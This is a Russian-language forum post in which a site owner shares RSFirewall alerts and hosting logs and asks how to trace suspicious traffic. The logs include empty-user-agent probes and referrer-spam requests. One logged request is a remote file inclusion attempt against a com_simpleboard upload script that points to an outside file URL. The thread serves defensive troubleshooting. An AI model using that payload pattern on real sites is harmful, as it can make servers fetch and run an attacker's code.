RSFirewall. Вопрос по дальнейшим действиям

Установлен RSFirewall. Пришло предупреждение, что сначала с 46.38.63.68, а потом с моего IP было несколько попыток отправить такой запрос: домен/components/com_simpleboard/file_upload.php?sbp=http://gold-live.ru/file.php

RS автоматически заблокировал этот IP, следовательно сайт для меня перестал открываться) Через БД удалил свой IP и возник вопрос, что мне дальше делать: как понять куда копать, чтобы найти источник этого запроса.
На сайте com_simpleboard не установлен.

Подскажите пожалуйстаззззззз
1
Сайт: http://www.site.ru/
Страница: http://www.site.ru/js/fckeditor/editor/
Запрос: Нет запроса
Описание: Обнаружен пустой пользовательский агент.
Уровень тревоги: низкий
Дата события: 2015-06-05 14:12:36
IP адреса: 43.249.81.65
2
Сайт: http://www.site.ru/
Страница: http://www.site.ru/common/fckeditor/editor/
Запрос: Нет запроса
Описание: Обнаружен пустой пользовательский агент.
Уровень тревоги: низкий
Дата события: 2015-06-05 14:12:35
IP адреса: 43.249.81.65
ID пользователя: 0

1и 2 пробивают видимо на наличие модулей ок.

3
Сайт: http://site.ru/
Страница: http://site.ru/uslugi/
Запрос: http://laxdrills.com/
Описание: IP заблокирован по гео-признаку.
Уровень тревоги: низкий
Дата события: 2015-06-05 13:21:49
IP адреса: 94.153.10.249

4
Сайт: http://site.ru/
Страница: http://site.ru/uslugi/
Запрос: http://elmifarhangi.com/
Описание: IP заблокирован по гео-признаку.
Уровень тревоги: низкий
Дата события: 2015-06-05 13:21:48
IP адреса: 94.153.10.249

5
Сайт: http://site.ru/
Страница: http://site.ru/uslugi/
Запрос: http://laxdrills.com/
Описание: IP заблокирован по гео-признаку.
Уровень тревоги: низкий
Дата события: 2015-06-05 13:21:46
IP адреса: 94.153.10.249

3,4,5 - это что такое ? по 20-40 сообщений по утру и по 10-15 днем

Ну есть же возможность блокировки по странам, это и есть 3,4,5.

меня интересует ЗАПРОС ...
Запрос: http://elmifarhangi.com/
Запрос: http://elmifarhangi.com/

Это что такое?

логи у хостера такие

94.153.10.249 - - [07/Jun/2015:09:07:09 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://shoidia.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:10 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://sdy-rala.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:11 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://sdy-rala.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:10 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://shoidia.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:11 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://shoidia.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:11 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://sdy-rala.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"

Вот насчет этого - хз